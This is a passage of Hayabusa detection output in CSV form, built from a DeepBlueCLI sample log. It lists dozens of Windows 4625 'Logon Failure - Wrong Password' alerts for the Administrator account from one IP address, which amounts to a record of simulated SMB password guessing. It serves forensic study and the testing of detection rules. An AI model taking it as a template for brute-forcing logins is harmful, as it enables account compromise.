NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkti4BGVrpoAQRBL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZy2YJPOg1YZ2bd0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUE6E9H9i0l0P7Jp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Pkpt2nmRorQ3x0o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCZNNzSyi4mLLaxZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O9ZqF43sDjSirvMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XOw9DjHISDX57XUe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rmxFpEQeGsgbXpDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfIVCOOWQS7TNKQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uweLaLhvznDee1IF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oNQcS2BonF12ikiX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D43Flf2keSL3aph6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zw7nJXNHZ2QNa3In : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UZp4567BIWAwxF9r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9iVvPuykq62pV9z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRVomETC34InuKPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VpHfjKgAxChSYz8R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tIbTy5IDRy90lbUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mM6Olq0zYkMlwmrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUehtGEh0EqRHiLP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhZ2KHmCTonGrXSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZea5qiet7vrT3iv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNWY8kuJMSy8h0Zk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bt9DUQ0mwhkJlTt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zXYtsM2MMuNSYtVr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgzvsdMN2SU7Knlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxiBYXNCY32yNb6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVfJmOxvsp75g3a0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHp1hlHjD8w3WKt3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEeJWAJgOeueYSM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tOfPGoUXu932L80d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NbH4R6GK1PIVT3ij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgsJokRd07Nh1lO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 11ylyxQyV5HCJ18g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Am2qI1ya4wYdqErV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2AmZsYUYmDpWZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c0Hd8xWxOxFifJBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlh64Gtfoig2uzOY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LtK8Hj2kf3dfFSnW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VKUPqxtNqkVqXgTg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SKSxp87CBg8L8wSi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CpvxvR0ftQs1gdEF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9RGDzNMt9fM6rLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvOO9NLhbbKJXQq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mDB9bIx7LcoJ6IAU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfJWsGqlQTmFUUPT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9PRIO3MASsjrdQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9QCn4nZHB0ENeA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4iUNHB1gE2d1dBfZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tM3IdtrLdVXQjOjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dbmn9Er9e1JZZybc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SY40ARcAoo9cWQIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fc7m0blzidQfn1BU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13SkGPbDDXou7qLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YIlJeZpJlvcKgqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BRhH6atcwLcGmrB4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGIInLsy4UCfl0oW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qJ7nEN0u9DkVuVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6qb85lEENmrj4ebF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6RXAj26rnxMmxuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tas7cqRNGQw6FlVX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQlF8GYIeWytFLsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dj48ftx52s1HntRT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B46vTS9PxUgUblBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoIFbywJEC0QaceV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSXqaP0i1eeKQOmX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gke4vfzIAC3k0yXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZnjxfeIX4ra6vmBA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ChR30FLLOT3Pvapv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VkepVf00vkpVp9yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5i2AxYxwCX6DvP3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8Fvcw2mQBI61mxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAazyOpBig2G3Z78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1g3rjPQQAXEK2yz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BC68zrAEF6L00xS : IP Address: 192.168.198.149 : AuthPackage: 